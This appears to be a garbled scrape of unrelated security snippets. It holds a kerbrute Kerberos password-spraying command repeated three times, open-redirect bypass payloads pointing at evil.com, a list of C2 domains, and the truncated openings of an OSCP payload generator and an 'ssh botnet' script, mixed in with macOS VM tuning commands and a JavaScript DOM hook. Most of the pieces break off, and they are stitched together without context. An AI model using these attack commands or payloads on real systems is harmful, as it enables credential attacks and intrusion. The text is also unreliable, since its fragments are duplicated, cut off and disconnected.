With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# I use MacOS VMs from github for iOS development. | |
# By no suprise they are a bit slow and have a lot of things I don't use | |
# Hence this script for lighter and better VM for my iOS development and builds | |
# GUI and animation related things to tweak | |
defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false | |
defaults write NSGlobalDomain NSWindowResizeTime -float 0.001 | |
defaults write -g QLPanelAnimationDuration -float 0 | |
defaults write com.apple.dock autohide-time-modifier -float 0 | |
defaults write com.apple.dock launchanim -bool false | |
sudo sysctl debug.lowpri_throttle_enabled=0 |
Simply try to change the domain
Example: ?redirect=https://example.com --> ?redirect=https://evil.com
Bypass the filter when protocol is blacklisted using //
Example: ?redirect=https://example.com --> ?redirect=//evil.com
var logger = console.trace; | |
// ELEMENT | |
;(getElementByIdCopy => { | |
Element.prototype.getElementById = function(q) { | |
logger('getElementById', q, this, this.innerHTML); | |
return Reflect.apply(getElementByIdCopy, this, [q]) | |
} | |
})(Element.prototype.getElementById) |
#!/usr/bin/env python3 | |
# Author: @m8sec | |
import os | |
import threading | |
from sys import exit | |
from time import sleep | |
from datetime import datetime | |
from subprocess import getoutput | |
from taser.proto.http import web_request |
import httplib | |
import urllib | |
http = httplib.HTTPSConnection('example.com', 443) | |
cookie = 'your=cookies'; | |
http.request("GET", "/api/v1/csrf", "", { | |
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36', | |
'referer': 'https://example.com/', |
# C2 FQDNs | |
first seen fqdn | |
2019-12-11 23:37:10 updatemanagir.us | |
2019-12-20 17:51:05 cmdupdatewin.com | |
2019-12-26 18:03:27 scrservallinst.info | |
2020-01-10 00:33:57 winsystemupdate.com | |
2020-01-11 23:16:41 jomamba.best | |
2020-01-13 05:13:43 updatewinlsass.com | |
2020-01-16 11:38:53 winsysteminfo.com | |
2020-01-20 05:58:17 livecheckpointsrs.com |
#!/usr/bin/env bash | |
# Script to quickly and easily create non-meterpreter payloads for the OSCP | |
# @m8sec | |
# Note: It is recommeneded to create a new directory before running this | |
# script. All payloads will be placed in the current directory | |
IP="127.0.0.1" # <YOUR IP HERE> | |
PORT=443 # You may have to change this if there are outbound restrictions on the target ;) |
# basic ssh botnet | |
import pxssh #calling pxssh module | |
class Client: #defining class with name client | |
def_init_(self,host,user,password): | |
self.host = host | |
self.user=user | |
self.password = password | |
self.session = self.connect() # for ssh session | |